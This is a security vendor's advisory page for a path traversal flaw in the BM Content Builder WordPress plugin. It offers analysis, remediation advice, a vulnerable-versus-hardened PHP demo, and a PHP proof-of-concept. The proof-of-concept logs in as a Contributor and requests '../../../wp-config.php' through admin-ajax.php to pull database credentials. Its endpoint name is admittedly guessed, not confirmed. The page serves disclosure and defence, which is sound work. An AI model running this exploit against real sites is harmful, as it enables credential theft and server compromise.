Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69055: BM Content Builder < 3.16.3.3 – Authenticated (Contributor+) Arbitrary File Download (bm-builder)

Plugin bm-builder
Severity Medium (CVSS 6.5)
CWE 22
Vulnerable Version < 3.16.3.3
Patched Version 3.16.3.3
Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-69055 (metadata-based):
This vulnerability is an authenticated path traversal flaw in the BM Content Builder WordPress plugin. It allows users with Contributor-level permissions or higher to read arbitrary files from the server’s filesystem. The vulnerability affects all plugin versions before 3.16.3.3 and has a CVSS score of 6.5 (Medium severity).

The root cause is improper limitation of a pathname to a restricted directory (CWE-22). The plugin likely accepts user-controlled input for a file path parameter and uses it directly in a file read operation without proper validation or sanitization. Atomic Edge research infers the vulnerable code does not normalize or restrict the input path, allowing directory traversal sequences like ‘../’ to escape the intended directory. This conclusion is based on the CWE classification and vulnerability description, not direct code review.

Exploitation requires an authenticated WordPress session with at least Contributor-level access. The attacker would send a request to a plugin-specific endpoint, likely an AJAX handler at /wp-admin/admin-ajax.php. The request would contain an action parameter referencing a plugin function (e.g., action=bm_builder_download) and a file path parameter containing traversal sequences (e.g., file=../../../wp-config.php). The server would then return the contents of the specified file. Note that the action and parameter names above are inferred from the plugin slug rather than confirmed from the plugin's source, and a real handler may additionally require the plugin's own AJAX nonce, so a working request must be reconstructed from the vulnerable code.

Remediation requires canonicalising the requested path and confirming it stays inside the intended directory. The patch likely adds validation that rejects paths containing directory traversal sequences; rejecting the literal '../' string is not sufficient on its own, since absolute paths, alternate separators and symlinks inside the directory can sidestep a substring filter. The robust form resolves the candidate with realpath() and checks that the result has the canonical base directory (under WordPress's ABSPATH constant or the plugin's own storage directory) as a prefix, or compares the request against a whitelist of permitted files. The fix must also keep the capability check and the AJAX nonce check in place, since the flaw is reachable from a Contributor-level account.
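The following is an added example, not the plugin's code and not the actual patch (this page does not show the diff). It puts an illustrative download-path resolver in the vulnerable form described under the root cause next to a hardened form of the remediation, and runs both against a small directory tree built in the system temp directory. The function names, the directory layout and the sample requests are assumptions for the demo.

```php
<?php
// Added example (not the bm-builder plugin's code): the root-cause pattern of
// CWE-22 next to a hardened resolver, exercised against a constructed tree.

// VULNERABLE: untrusted input is concatenated onto the base directory with no
// normalisation and no containment check, so "../" walks out of $base_dir.
function resolve_download_path_vulnerable(string $base_dir, string $requested): string
{
    return $base_dir . '/' . $requested;
}

// HARDENED: canonicalise with realpath() and require the result to sit
// strictly inside the canonical base directory. A substring filter on "../"
// alone is bypassable (absolute paths, alternate separators, symlinks); the
// prefix check on the canonical path is what actually closes the traversal.
function resolve_download_path(string $base_dir, string $requested): ?string
{
    $base = realpath($base_dir);
    if ($base === false) {
        return null;                                   // base directory missing
    }
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;                                   // empty or null-byte input
    }
    if ($requested[0] === '/' || preg_match('#^[A-Za-z]:[\\\\/]#', $requested)) {
        return null;                                   // absolute path, not a relative name
    }
    $candidate = realpath($base . '/' . $requested);   // resolves "..", "." and symlinks
    if ($candidate === false || !is_file($candidate)) {
        return null;                                   // no such regular file
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                                   // resolved outside the base directory
    }
    return $candidate;
}

// In a real WordPress handler this resolver sits behind the capability and
// nonce checks, e.g. current_user_can(...) and check_ajax_referer(...); they
// are left out here so the demo runs without WordPress loaded.

// --- demo against a constructed directory tree (assumed layout) -----------
$root = sys_get_temp_dir() . '/cwe22_demo_' . bin2hex(random_bytes(4));
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/uploads/report.pdf", 'public upload');
file_put_contents("$root/wp-config.php", "<?php define('DB_NAME', 'secret');");
@symlink("$root/wp-config.php", "$root/uploads/link-out");   // link escaping the base

$cases = ['report.pdf', '../wp-config.php', '/etc/passwd', 'link-out'];
foreach ($cases as $req) {
    $vuln = resolve_download_path_vulnerable("$root/uploads", $req);
    $safe = resolve_download_path("$root/uploads", $req);
    printf("%-20s vulnerable -> %-6s hardened -> %s\n",
        $req,
        is_file($vuln) ? 'READS' : 'miss',
        $safe === null ? 'rejected' : 'serves ' . basename($safe));
}

// tidy up the temporary tree
foreach (["$root/uploads/link-out", "$root/uploads/report.pdf", "$root/wp-config.php"] as $f) {
    @unlink($f);
}
rmdir("$root/uploads");
rmdir($root);
```

Run it with the PHP CLI. The vulnerable resolver serves '../wp-config.php' and the symlink 'link-out' because is_file() happily follows both; the hardened resolver rejects everything except 'report.pdf', including the symlink, because realpath() resolves the link target before the prefix comparison.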

The impact is unauthorized disclosure of sensitive server files. Attackers can read WordPress configuration files (wp-config.php), which contain database credentials and secret keys. They can also access system files (/etc/passwd), log files, and other application source code. This information leakage can facilitate further attacks, including database compromise and privilege escalation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69055 - BM Content Builder < 3.16.3.3 - Authenticated (Contributor+) Arbitrary File Download

$target_url = 'https://example.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// File to download (adjust traversal depth as needed)
$target_file = '../../../wp-config.php';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Check login success: a successful login sets a wordpress_logged_in_* cookie.
// (Searching the HTML for "wp-admin" is not reliable, since the login form
// itself echoes the redirect_to URL.)
$cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);
$logged_in = is_array($cookies) && count(preg_grep('/wordpress_logged_in_/', $cookies)) > 0;
if (!$logged_in) {
    die("Login failed. Check credentials.\n");
}

// Assumed vulnerable AJAX endpoint and action
// The exact action name is inferred from plugin slug 'bm-builder'
$ajax_action = 'bm_builder_download_file';

// Build exploit request to admin-ajax.php
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => $ajax_action,
    'file' => $target_file  // Unvalidated path parameter
]));

$exploit_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results
// admin-ajax.php answers an unknown action with the body "0" (HTTP 400 on
// current WordPress), so treat that the same as no response.
if (!empty($exploit_response) && $exploit_response !== '0') {
    echo "Exploit attempt completed (HTTP $http_code). Response length: " . strlen($exploit_response) . " bytes\n";
    echo "First 500 characters of response:\n";
    echo substr($exploit_response, 0, 500) . "\n";

    // Check for common indicators of successful file read
    if (strpos($exploit_response, 'DB_NAME') !== false ||
        strpos($exploit_response, '<?php') !== false ||
        strpos($exploit_response, 'root:') !== false) {
        echo "SUCCESS: Likely retrieved sensitive file contents.\n";
    }
} else {
    echo "No usable response (HTTP $http_code). The endpoint or action may be incorrect.\n";
}
